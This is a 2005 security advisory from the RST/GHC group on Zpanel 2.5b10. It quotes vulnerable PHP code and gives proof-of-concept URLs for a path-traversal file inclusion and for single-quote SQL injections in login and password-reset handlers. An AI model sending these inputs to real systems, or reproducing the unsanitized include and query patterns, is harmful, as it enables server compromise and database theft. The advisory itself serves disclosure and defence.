# # # # # # # # # # # # # ## #### ## # ## ## ###### ## ## ## ## ###### ## ## ## ## #### ## ## ### ############ ### ######################## ############## ######## ########## ####### ### ## ########## ## ### ### ## ########## ## ### ### # ########## # ### ### ## ######## ## ### ## # ###### # ## ## # #### # ## ## ## RST/GHC advisory # 26 --------------------------------------------------------------------------------------------------------------------------- PRODUCT : Zpanel VERSION : 2.5b10 VENDOR : Zee-Way Services http://www.zee-way.com , http://www.thezpanel.com --------------------------------------------------------------------------------------------------------------------------- FILE: exe_zpanel.php VULN: PHP code injection CODE: 22: if (!isset($_GET['page'])){ 23: $body = "main.php"; 24: }else{ 25: if (!isset($_GET['ext']) || $_GET['ext'] == ''){ 26: if ($_GET['page'] == "main") { 27: $body = "main.php"; 28: }else{ 29: $body = "modules/" . $_GET['page'] . "/index.php"; 30: } 31: }else{ 32: $body = "modules/" . $_GET['page'] . "/" . $_GET['ext'] . ".php"; 33: } 34: } ... 53: include ($body); INFO: http://host/zpanel/exe_zpanel.php?page=../../../../../blah http://host/zpanel/exe_zpanel.php?page=../../../../../blah&ext=blah --------------------------------------------------------------------------------------------------------------------------- FILE: exe_login.php VULN: SQL injection CODE: 5: if (isset($_GET['query'])) { 6: 7: if ($_GET['query'] == 'login'){ ... 15: $query_Recordset1 = sprintf("SELECT * FROM custumerbase WHERE servicename = '".$_GET['uname']."'", $colname_Recordset1); INFO: if magic_guotes = Off http://host/zpanel/exe_login.php?query=login&uname=' --------------------------------------------------------------------------------------------------------------------------- FILE: zpanel.php VULN: SQL injection CODE: 98: if (isset($_GET['passrequest'])) { 99: if (isset($_GET['user']) && isset($_GET['code']) && ($_GET['code'] != '')) { 100: mysql_select_db($database_Customer_Database, $Customer_Database); 101: $query_TempUser = sprintf("SELECT * FROM custumerbase WHERE servicename = '".$_GET['user']."'"); INFO: if magic_guotes = Off http://host/zpanel/?passrequest&code=blah&user=' --------------------------------------------------------------------------------------------------------------------------- FILE: zpanel.php VULN: SQL injection CODE: 98: if (isset($_GET['passrequest'])) { ... 117: if (isset($_POST['email'])) { 118: mysql_select_db($database_Customer_Database, $Customer_Database); 119: $query_TempUser = sprintf("SELECT * FROM custumerbase WHERE email = '".$_POST['email']."'"); --------------------------------------------------------------------------------------------------------------------------- 1dt.w0lf RST/GHC http://rst.void.ru http://ghc.ru 28.04.2005